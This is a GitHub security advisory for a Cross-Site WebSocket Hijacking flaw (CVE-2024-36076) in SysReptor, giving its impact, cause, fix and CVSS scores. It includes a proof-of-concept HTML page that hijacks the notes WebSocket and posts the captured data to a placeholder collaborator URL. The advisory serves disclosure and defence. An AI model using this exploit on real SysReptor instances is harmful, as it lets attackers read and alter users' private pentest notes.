Skip to content

Cross-Site Websocket Hijacking in SysReptor

Moderate
aronmolnar published GHSA-2vfc-3h43-vghh May 21, 2024

Package

SysReptor

Affected versions

>= 2024.28 <= 2024.30

Patched versions

2024.40

Description

Impact

Cross-Site WebSocket Hijacking in SysReptor from version 2024.28 to version 2024.30 causes attackers to gain read and write access to personal notes and project notes when a logged-in SysReptor user visits a malicious same-site subdomain in the same browser session.

Patches

Update to SysReptor version 2024.40.
We additionally recommend configuring allowed hostnames/domain names via the ALLOWED_HOSTS setting.

Detailed Description

The root cause is the switch protocol sequence which is not protected by browsers' same-origin policy. The SysReptor server does not validate the Origin when establishing WebSocket connections. SysReptor uses session cookies for authentication, which browsers send cross-origin (but same-site due to SameSite=Strict).
However, the attack is limited to malicious same-site subdomains because SysReptor uses the cookie setting SameSite Strict. Hence, attackers must compromise a subdomain to host a malicious script (e.g., evil.example.com to attack sysreptor.example.com).

Attackers could gain read and write access to personal user notes (/ws/pentestusers/self/notes/) and project notes (/ws/pentestprojects/{target-project-uuid}/notes/). To access project notes, attackers need to obtain the project UUID.

Attack Chain

Prerequisites:

  • Same-site subdomain
  • Logged-in target user
  • Project UUID (optional)
  1. Compromise a subdomain
  2. Host the malicious script on the subdomain:
<!DOCTYPE html>
 <html lang="en">
   <head>
     <title>CSWSHJ Exploit</title>
     <script>
      var url = "wss://sysreptor.example.com/ws/pentestusers/self/notes/";
      // var url = "wss://sysreptor.example.com/ws/pentestprojects/{target-project-uuid}/notes/";
       var ws = new WebSocket(url);
       ws.onmessage = function (event) {
         fetch("{burp-collaborator-url}", {
           method: "POST",
           mode: "no-cors",
           body: event.data,
         });
       };
     </script>
   </head>

   <body>
       <h1>CSWSHJ</h1>
       <h3>Triggered exploit...</h3>
   </body>
 </html>
  1. Trick logged-in users into visiting the malicious subdomain to trigger the WebSocket hijacking attack and exfiltrate data from the WebSocket.

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
High
Privileges required
None
User interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N

CVE ID

CVE-2024-36076

Weaknesses

Credits